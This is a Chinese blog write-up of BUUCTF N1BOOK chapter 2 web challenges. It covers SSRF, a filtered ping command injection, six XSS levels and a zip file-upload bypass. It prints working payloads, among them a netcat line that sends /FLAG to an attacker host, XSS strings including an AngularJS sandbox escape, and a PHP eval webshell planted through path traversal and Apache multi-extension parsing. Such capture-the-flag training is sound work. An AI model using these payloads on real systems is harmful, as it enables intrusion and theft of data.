[CTF夺旗赛] BUUCTF N1BOOK 第二章 web进阶

于 2024-08-23 16:51:40 发布
阅读量1.2k 收藏 22
点赞数 24
分类专栏: CTF 网络安全 文章标签: 前端 android web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/da1nty/article/details/141469548
版权

文章目录

前言

CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。

BUUCTF是一个很好的CTF训练平台,这里介绍的是N1BOOK部分的第二章,后续会陆续更新
BUUCTF网址:https://buuoj.cn/
在这里插入图片描述

[第二章 web进阶]SSRF Training

1.首先,我们打开首页,发现提示这是一个SSRF漏洞,所以我们想到的就是URL构造。我们看到首页上有一个intersting challenge,可以进行代码审计,这里flag应该在flag.php中。

在这里插入图片描述

2.这里我们先点开intersting challenge,我们进行一下代码审计。

 <?php 
highlight_file(__FILE__);
function check_inner_ip($url) 
{ 
    //正则匹配,判断返回的url值是0次(不匹配)或是1
    $match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url); 
    if (!$match_result) 
    { 
        die('url fomat error'); 
    } 
    try 
    { 
        $url_parse=parse_url($url); 
    } 
    catch(Exception $e) 
    { 
        die('url fomat error'); 
        return false; 
    } 
    //主机名hostname
    $hostname=$url_parse['host'];
    //通过域名获取IP地址
    $ip=gethostbyname($hostname); 
    //将IPv4的地址转换成int(以小数点分隔)
    $int_ip=ip2long($ip); 
    return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16; 
} 

function safe_request_url($url) 
{ 
     
    if (check_inner_ip($url)) 
    { 
        echo $url.' is inner ip'; 
    } 
    else 
    {
        //初始化cURL会话
        $ch = curl_init();
        //设置请求选项
        curl_setopt($ch, CURLOPT_URL, $url); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
        curl_setopt($ch, CURLOPT_HEADER, 0);
        //执行会话
        $output = curl_exec($ch); 
        $result_info = curl_getinfo($ch); 
        if ($result_info['redirect_url']) 
        { 
            safe_request_url($result_info['redirect_url']); 
        } 
        //释放会话
        curl_close($ch);
        var_dump($output); 
    } 
     
} 

$url = $_GET['url']; 
if(!empty($url)){ 
    safe_request_url($url); 
} 

?>

代码审计:

  1. check_inner_ip 函数

    • 这个函数接收一个 URL,并首先验证其格式是否正确。
    • 然后,它解析 URL,提取主机名,并将主机名解析为 IP 地址。
    • 该函数将 IP 地址转换为长整型,并检查是否属于常见的内网 IP 地址段(127.0.0.0, 10.0.0.0, 172.16.0.0, 192.168.0.0)。

  2. safe_request_url 函数

    • 这个函数使用 check_inner_ip 函数来检查 URL 是否为内网 IP 地址。
    • 如果是内网 IP,它会输出一个消息;否则,使用 cURL 执行请求。
    • 如果 URL 有重定向,会递归调用 safe_request_url 函数来处理重定向的 URL。
    • 最后,输出请求的结果。

  3. 主程序

    • $_GET 请求中获取 URL,并在非空时调用 safe_request_url

3.使用POST传参,点开F12,在HackBar进行Post传参url=http://127.0.0.1/flag.php,得到flag(n1book{ug9thaevi2JoobaiLiiLah4zae6fie4r}

在这里插入图片描述

[第二章 web进阶]死亡ping命令

1.首先,打开首页我们发现这里有一个ping命令输入框,那么是否可以在这里输入其他命令呢?

在这里插入图片描述

2.我们输入127.0.0.1&dir,发现报错,显示存在恶意字符。
在这里插入图片描述

3.使用burpsuite进行抓包,进行扫描测试,我们这里使用的字符字典:

"~","!","@","#","$","%","^","&","*","(",")","-","_","\\","[","]"," ' ","%0a","%0b","%0c","%0d"

在这里插入图片描述

在这里插入图片描述

4.我们来测试一下%0a是否可以绕过,我们发送一个包,显示ping成功,说明可以绕过。

在这里插入图片描述

5.因为是没有回显的,所以使用反弹shell,在kali上开启nc监听。首先我们需要一个有公网ip的攻击机。这里我们没有,所以我们再开一个小号

编写1.sh:

ls
cat /FLAG | nc 攻击机ip port

由于现在buu上没有内网机,所以就不过多赘述了。

[第二章 web进阶]XSS闯关

1.起到靶机后打开主页,看到了有三个选项:使用说明、点我开始和重置游戏。使用说明获得提示。

在这里插入图片描述

2.点我开始进入第一关。第一关查看一下源码,我们发现并没有做任何的过滤,所以我们是可以直接注入的(?username=<script>alert('xss')</script>)。

_alert = alert;
alert = function(info){
	_alert("过关成功!进入下一关!");
	var current_level = location.pathname.match(/level([0-9]+)/)[1];
	var next_level = parseInt(current_level) + 1;
	location.href = "/level" + next_level;
}

在这里插入图片描述

3.进入第二关,我们首先尝试上一次的注入,发现并没有回显,查看源代码,发现username被escape隐藏加密了。所以我们就需要绕过这个过滤。我们这里使用的是闭合绕过(?username=1';alert(1);'1)。

<script type="text/javascript">
    	if(location.search == ""){
    		location.search = "?username=xss"
    	}
    	var username = '<script>alert('xss')</script>';
    	document.getElementById('ccc').innerHTML= "Welcome " + escape(username);
</script>

在这里插入图片描述

4.进入第三关,使用上一关的注入方法,发现没有回显,查看源代码,根据代码可知,单引号被转义了,所以我们再加一个单引号,构造成?username='';alert(1);'1

<script type="text/javascript">
    	if(location.search == ""){
    		location.search = "?username=xss"
    	}
    	var username = '?username=1\';alert(1);'1';
    	document.getElementById('ccc').innerHTML= "Welcome " + username;
</script>

在这里插入图片描述

5.进入第四关,使用上一关的方法注入,发现回显的是一个xx秒后跳转,查看源代码,设置了一个倒计时,当倒计时结束后会重定向到指定的链接,链接url通过getQueryVariable( )来获取,将其转义后输出到页面中。所以我们需要来构造这个url,并在url中注入(jumpUrl=javascript:alert(1)),注入成功10秒后就会跳转。

<script type="text/javascript">
    	var time = 10;
    	var jumpUrl;
    	if(getQueryVariable('jumpUrl') == false){
    		jumpUrl = location.href;
    	}else{
    		jumpUrl = getQueryVariable('jumpUrl');
    	}
    	setTimeout(jump,1000,time);
    	function jump(time){
    		if(time == 0){
    			location.href = jumpUrl;
    		}else{
    			time = time - 1 ;
    			document.getElementById('ccc').innerHTML= `页面${time}秒后将会重定向到${escape(jumpUrl)}`;
    			setTimeout(jump,1000,time);
    		}
    	}
		function getQueryVariable(variable)
		{
		       var query = window.location.search.substring(1);
		       var vars = query.split("&");
		       for (var i=0;i<vars.length;i++) {
		               var pair = vars[i].split("=");
		               if(pair[0] == variable){return pair[1];}
		       }
		       return(false);
		}
</script>

在这里插入图片描述

6.进入第五关,我们发现这里有一个表单提交。查看源代码,我们发现我们如果想要成功注入,需要绕过getQueryVariable( )这个函数,所以我们就需要来构造使他执行绕过,我们分析代码,构造?autosubmit=true&action=javascript:alert(1)

<script type="text/javascript">
    	if(getQueryVariable('autosubmit') !== false){
    		var autoForm = document.getElementById('autoForm');
    		autoForm.action = (getQueryVariable('action') == false) ? location.href : getQueryVariable('action');
    		autoForm.submit();
    	}else{
    		
    	}
		function getQueryVariable(variable)
		{
		       var query = window.location.search.substring(1);
		       var vars = query.split("&");
		       for (var i=0;i<vars.length;i++) {
		               var pair = vars[i].split("=");
		               if(pair[0] == variable){return pair[1];}
		       }
		       return(false);
		}
</script>

在这里插入图片描述

7.进入第六关,这也是XSS挑战的最后一关!前面的方法肯定是用不了了,我们注入一下来测试,方便我们看出问题,这里我们注入<script>alert('xss')</script>,发现直接就显示在上面了。

在这里插入图片描述

我们来看一下源代码,看看是个什么玩意。

<script src="https://cdn.staticfile.org/angular.js/1.4.6/angular.min.js"></script>

我们发现了这一行,这个使用的是angular.js/1.4.6/angular.min.js,我们去网页上搜索一下,看看这个js有什么xss漏洞,我们确定了这是一个模板注入,根据找到的资料,构造为?username={{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}。我们成功获取到了flag(n1book{xss_is_so_interesting})。

在这里插入图片描述

[第二章 web进阶]文件上传

1.首先,我们点开首页,发现是一个文件上传页面,这时候我们就想到上传个一句话木马用蚁剑来连接。我们先上传一个一句话木马来试试水。
在这里插入图片描述

在这里插入图片描述

2.上传后发现报错,查看源代码,看看问题出在哪里。

<?php
header("Content-Type:text/html; charset=utf-8");
// 每5分钟会清除一次目录下上传的文件
require_once('pclzip.lib.php');

if(!$_FILES){

        echo '

<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta http-equiv="X-UA-Compatible" content="ie=edge" />
    <title>文件上传章节练习题</title>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
    <style type="text/css">
        .login-box{
            margin-top: 100px;
            height: 500px;
            border: 1px solid #000;
        }
        body{
            background: white;
        }
        .btn1{
            width: 200px;
        }
        .d1{
            display: block;
            height: 400px;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="login-box col-md-12">
        <form class="form-horizontal" method="post" enctype="multipart/form-data" >
            <h1>文件上传章节练习题</h1>
            <hr />
            <div class="form-group">
                <label class="col-sm-2 control-label">选择文件:</label>
                <div class="input-group col-sm-10">
                    <div >
                    <label for="">
                        <input type="file" name="file" />
                    </label>
                    </div>
                </div>
            </div>
                
        <div class="col-sm-8  text-right">
            <input type="submit" class="btn btn-success text-right btn1" />
        </div>
        </form>
        </div>
    </div>
</body>
</html>
';

    show_source(__FILE__);
}else{
    $file = $_FILES['file'];

    if(!$file){
        exit("请勿上传空文件");
    }
    $name = $file['name'];

    $dir = 'upload/';
    $ext = strtolower(substr(strrchr($name, '.'), 1));
    $path = $dir.$name;

    function check_dir($dir){
        $handle = opendir($dir);
        while(($f = readdir($handle)) !== false){
            if(!in_array($f, array('.', '..'))){
                if(is_dir($dir.$f)){
                    check_dir($dir.$f.'/');
                 }else{
                    $ext = strtolower(substr(strrchr($f, '.'), 1));
                    if(!in_array($ext, array('jpg', 'gif', 'png'))){
                        unlink($dir.$f);
                    }
                }
            
            }
        }
    }

    if(!is_dir($dir)){
        mkdir($dir);
    }

    $temp_dir = $dir.md5(time(). rand(1000,9999));
    if(!is_dir($temp_dir)){
        mkdir($temp_dir);
    }

    if(in_array($ext, array('zip', 'jpg', 'gif', 'png'))){
        if($ext == 'zip'){
            $archive = new PclZip($file['tmp_name']);
            foreach($archive->listContent() as $value){
                $filename = $value["filename"];
                if(preg_match('/\.php$/', $filename)){
                     exit("压缩包内不允许含有php文件!");
                 }
            }
            if ($archive->extract(PCLZIP_OPT_PATH, $temp_dir, PCLZIP_OPT_REPLACE_NEWER) == 0) {
                check_dir($dir);
                   exit("解压失败");
            }

            check_dir($dir);
            exit('上传成功!');
        }else{
            move_uploaded_file($file['tmp_name'], $temp_dir.'/'.$file['name']);
            check_dir($dir);
            exit('上传成功!');
        }
    }else{
        exit('仅允许上传zip、jpg、gif、png文件!');
    }
}

接着我们来分析代码:

1) 处理文件上传

$file = $_FILES['file'];

if(!$file){
    exit("请勿上传空文件");
}
$name = $file['name'];
  • 代码首先从 $_FILES 数组中获取上传的文件,并检查是否存在文件。如果文件不存在,会提示“请勿上传空文件”并终止脚本。

2)设定上传目录和文件扩展名

$dir = 'upload/';
$ext = strtolower(substr(strrchr($name, '.'), 1));
$path = $dir.$name;
  • dir 变量指定了上传文件的目录(upload/)。
  • ext 提取了文件的扩展名,并将其转换为小写。

3)目录检查函数 check_dir

function check_dir($dir){
    $handle = opendir($dir);
    while(($f = readdir($handle)) !== false){
        if(!in_array($f, array('.', '..'))){
            if(is_dir($dir.$f)){
                check_dir($dir.$f.'/');
             }else{
                $ext = strtolower(substr(strrchr($f, '.'), 1));
                if(!in_array($ext, array('jpg', 'gif', 'png'))){
                    unlink($dir.$f);
                }
            }
        }
    }
}
  • 该函数递归遍历指定目录及其子目录,删除所有非 jpggifpng 格式的文件。此函数的目的是确保上传目录中只保留允许的图片文件。

4)检查并创建目录

if(!is_dir($dir)){
    mkdir($dir);
}
$temp_dir = $dir.md5(time(). rand(1000,9999));
if(!is_dir($temp_dir)){
    mkdir($temp_dir);
}
  • 代码检查是否存在上传目录 upload/,如果不存在则创建之。
  • 然后,创建一个临时目录,用于保存解压后的文件。这个临时目录的名称是通过 md5(time(). rand(1000,9999)) 生成的,以确保唯一性。

5)文件类型检查与处理

if(in_array($ext, array('zip', 'jpg', 'gif', 'png'))){
    if($ext == 'zip'){
        $archive = new PclZip($file['tmp_name']);
        foreach($archive->listContent() as $value){
            $filename = $value["filename"];
            if(preg_match('/\.php$/', $filename)){
                 exit("压缩包内不允许含有php文件!");
            }
        }
        if ($archive->extract(PCLZIP_OPT_PATH, $temp_dir, PCLZIP_OPT_REPLACE_NEWER) == 0) {
            check_dir($dir);
               exit("解压失败");
        }
        check_dir($dir);
        exit('上传成功!');
    }else{
        move_uploaded_file($file['tmp_name'], $temp_dir.'/'.$file['name']);
        check_dir($dir);
        exit('上传成功!');
    }
}else{
    exit('仅允许上传zip、jpg、gif、png文件!');
}
  • 代码允许上传 zipjpggifpng 文件。
  • 如果上传的文件是 zip 压缩包,首先会检查压缩包内是否包含 .php 文件,如果有则终止操作并输出错误信息。
  • 解压文件到临时目录后,调用 check_dir 函数清理不符合要求的文件。
  • 如果是 jpggifpng 文件,则直接将文件移动到临时目录并调用 check_dir 函数进行检查。

所以我们要想绕过这些限制条件,就要一步一步来,首先,我们需要先来绕过白名单,也就是文件类型的限制条件,之后,除了.zip文件,其他的三种文件被move_uploaded_file,所以我们应该以zip文件的方式上传木马。接着,假如我们上传的是zip压缩包,会检查里面是否包含php文件,如果有会终止操作。所以我们就要进行绕过。

3.分析完代码,我们来看一下这个网站的相关信息,访问/upload页面,我们发现他使用的是Apache2.4.7, 这时我们就应该想到Apache多后缀名解析漏洞,也就是多后缀名文件会从最右后缀开始识别,如果后缀不存在对应的MIME type或handler,就会往左进行识别,一直识别到匹配为止。这也就是我们进行绕过的原理,我们可以来创建一个一句话木马,叫做yjh.php.aaa,这样使在绕过黑名单后,利用Apache的解析漏洞最终解析为.php文件进行执行。下面是一句话木马。

<?php
@eval($_REQUEST[777]);
?>

4.编写好木马后将木马进行压缩,我们发现可以传上去,但是访问不了,后来发现还是我们文件名的问题,文件名应设为/../../yjh.php.aaa,可是这样我们是命名不了的,所以需要对文件进行修改,这里使用010 Editor修改十六进制,我们先将文件命名为1111111yjh.php.aaa,然后将它放到010 Editor中修改。

在这里插入图片描述

5.修改后的文件进行上传,显示上传成功。

在这里插入图片描述

6.我们访问我们的文件yjh.php.aaa,显示出flag(n1book{ThisIsUpLoadToPicfl4g}

在这里插入图片描述

Da1NtY0926
关注
专栏目录
《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]死亡ping命令
weixin_46703850的博客
02-26 3450
《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]死亡ping命令
【网络安全CTFBUUCTF(Basic篇)
信安是不可或缺的一部分!
05-11 6591
参考之前写的:https://blog.csdn.net/qq_39583774/article/details/120722112?此题详解可以看:https://blog.csdn.net/weixin_43965597/article/details/126381171。admin 加密码登陆注意这里不是md5加密,开始看错了,解半天没解出发现是明文存储的,无语。使用其他方式,发现这里不对,上传一个phpinfo发现能够执行,但是执行的jpg格式。
[CTF夺旗赛] BUUCTF N1BOOK 第一章 web入门
最新发布
Da1NtY的博客
08-20 809
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。BUUCTF是一个很好的CTF训练平台,这里介绍的是N1BOOK部分的第一章,后续会陆续更新。
BUUCTF_MISC题解
热门推荐
m0_52885531的博客
05-30 2万+
BUUCTF_MISC题解 第二题 金三胖 将GIF图片用ps进行逐帧分解,可以得到三张特殊的照片 直接将三个照片里的内容拼接起来就好 第三题 二维码 下载好附件解压后发现是一个.png文件的二维码 用CQR扫描后得到二维码的结果 发现并没有得到想要的flag,并且提示我们flag并不在这李,那我们就用二进制编辑器打开看一看在哪里。 .png的文件尾是AE 42 60 82,按理来说在文件尾之后就应该结束,我们却发现png的文件尾后还跟着50 4B 03 04,这是.zip的文件头,说明在该照片
BUUCTF题目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 9173
BUUCTF题目Misc部分wp(持续更新)
BUUCTF】Misc题解
xuanyulevel6的博客
07-31 1万+
BUUCTF-Misc题解
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”CTF,先入手杂项部分,
m0_73935461的博客
04-09 3024
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”CTF,先入手杂项部分,首先我们先看一些图片的解题思路 图片类型:包含,图片该高宽,文件头损坏,图片隐写(内有压缩包),或者用kali的strings看一下图片内容在进行。可以在文件头中查看。上面标记着png图片,但是文件类型是pk(zip),像这种类型的文件一般是有问题的,我们就可以把这种文件到处去,在进行文件分析。
BUUCTF[第二章Web进阶]XSS闯关教程
DMXA的博客
11-01 707
攻击方式:这种攻击多见于论坛、博客和留言板,攻击者在发帖的过程中,将恶意代码连同正常信息一起注入帖子的内容中。当目标用户访问该链接时,服务器接收该目标用户的请求并进行处理,然后服务器把带有XSS代码的数据发送给目标用户的浏览器,浏览器解析这段带有XSS代码的恶意脚本后,就会触发XSS漏洞。存储型XSS又称为持久型XSS,攻击脚本将被永久的放在目标服务器的数据库或文件中,具有很高的隐蔽性。DOM型XSS其实是一种特殊的反射型XSS,它基于DOM文档对象模型的一种漏洞。(3)DOM型XSS。
ctf web解题 找flag夺旗赛概述、原理及应用.pdf
05-13
### CTF Web解题 找flag夺旗赛概述、原理及应用 #### 一、概述 CTF(Capture The Flag,夺旗赛)是网络安全领域内一种极为流行的竞赛形式,尤其是在Web安全领域。这种竞赛模式旨在模拟真实世界的网络安全挑战,...
BUUCTF [第二章 web进阶]SSRF Training1
sinat_41572027的博客
06-25 576
BUUCTF [第二章 web进阶]SSRF Training1 1.尝试输入正确URL,能正常跳转2.查看网页源码,发现challenge.php网页3.进入challenge.php,学习源码 4.构造payload 绕过parse_url() 5.成功绕过后,访问flag.php 获得flag 便捷方法:在url栏输入http://127.0.0.1/flag.php 即可成功访问...
CTF Web解题大解密:如何找到神秘的Flag,成为夺旗赛的MVP
12-29
为了在CTF Web解题中脱颖而出,成为夺旗赛的MVP,以下是一些关键的技巧和策略。 1. **全面分析目标网站**:首先,你需要深入理解你要攻击的目标,这包括浏览网站的所有页面,查看HTML源代码,分析JavaScript脚本,...
BUUCTF Misc杂项前十二道题的思路和感悟
太阳照耀我走四方
08-18 1万+
title: BUUCTF Misc date: 2021年8月18日 17点27分 tags: MISC categories: MISC 1、BUUCTF 签到题 直接告诉了flag。 2、BUUCTF 第二题(Stegsolve) 下载附件之后,得到一个gif动图。 使用Stegsolve打开。 然后一张一张的向后翻, 得到flag{he11ohongke} 3、BUUCTF 二维码(QR Research、Ziperrllo、winhex) 下载附件之后是一个zip压缩包。 解压之后得到.
BUUCTF-逆向
weixin_52125240的博客
04-11 5967
BUUCTF-ReBUUCTF-逆向1.easyre2.reverse13.reverse2 BUUCTF-逆向 1.easyre 先用虚拟机看看是多少位的文件; 拖进IDA看看,一下子就出来了; 2.reverse1 先用虚拟机看看是多少位的文件; 打开IDA,查找字符串; 点击View->Open subviews->Strings 然后观察伪代码 所有的 ’ o ’全都变成 ’ 0 ‘ ; flag{hell0_w0rld} 3.reverse2 一样的看看文件是多少位的;
CTF-MISC:BUUCTF练习汇总(1-25题,不包括签到题)
燕麦葡萄干的博客
07-30 5699
解题思路:该题比较基础,wireshark打开过滤HTTP流量包,追踪HTTP流后可以看到base64密文,解密后得到jpg图片,打开图片即可看到flag,在线OCR识别即可提取出flag值。解题思路:zip压缩包解压需要密码,图片中的盲文为解压的密码,解压后得到MP3音频文件,内容为典型的摩斯密码;解题思路:由题目可以为LSB隐写,使用StegSolve打开图片查看最低有效位得到PNG信息,另存为图片后发现是二维码,扫描后即可得到flag。对应摩斯电码为:-.-. - …-. .-- .–. . …
BUUCTFWeb题解
xuanyulevel6的博客
08-08 5387
BUUCTFWeb题解
BUUCTF在线评测简介
初尘屿风的博客
10-16 842
BUUCTF 是一个 CTF 竞赛和训练平台,为各位 CTF 选手提供真实赛题在线复现等服务。
BUUCTF-Web-题目详解(持续更新……)
AkangBoy的博客
12-11 4630
本文介绍BUUCTF平台上,web题目的详解过程,持续更新
BUUCTF
遇事不决冲冲冲
07-18 3710
[HCTF 2018]WarmUp 过程 1.找源代码 右键查看源代码或者F12发现提示 看到还有一个hint.php,再访问一下 2.分析源代码 if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file']) ) { include $_REQUEST['file'];
N1Book-第二章Web进阶-Web文件上传漏洞
weixin_40872714的博客
03-31 4516
N1Book-第二章Web进阶-Web文件上传漏洞 以下内容转自 https://www.icode9.com/content-4-874265.html <?php header("Content-Type:text/html; charset=utf-8"); // 每5分钟会清除一次目录下上传的文件 //会包含文件pclzip.lib.php,感觉这个php里面是有一些针对zip包进行解压等的操作的 require_once('pclzip.lib.php'); //要是没上传文件,就输出
新手指南:CTF夺旗赛入门与知名团队解析
CTF(Capture The Flag,中文常称为夺旗赛)是一种网络安全竞赛活动,起源于1996年的DEFCON全球黑客大会,其目的是让网络安全技术人员在一种安全可控的环境中展示技能,而不是通过实际攻击彼此。这种比赛形式取代了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Da1NtY0926

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值